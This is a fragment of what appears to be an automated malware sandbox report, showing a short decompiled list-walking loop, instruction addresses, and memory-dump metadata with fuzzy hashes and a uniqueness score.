						} else {
							goto L3;
						}
					}
					L5:
					return _t17;
					L3:
					_t31 =  *_t31;
				} while (_t23 != _t31);
				_t17 = 0;
				goto L5;
			}














                                  0x0040317f
                                  0x00403180
                                  0x00403180
                                  0x00403180
                                  0x0040318d
                                  0x00403196
                                  0x00403199
                                  0x0040319b
                                  0x004031a1
                                  0x004031a9
                                  0x004031ab
                                  0x004031ac
                                  0x004031ae
                                  0x00000000
                                  0x004031b0
                                  0x004031b3
                                  0x004031c2
                                  0x004031c7
                                  0x004031cd
                                  0x004031e0
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004031cd
                                  0x004031d7
                                  0x004031dd
                                  0x004031cf
                                  0x004031cf
                                  0x004031d1
                                  0x004031d5
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                  • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                  • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                  • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                  Uniqueness

                                  Uniqueness Score: -1.00%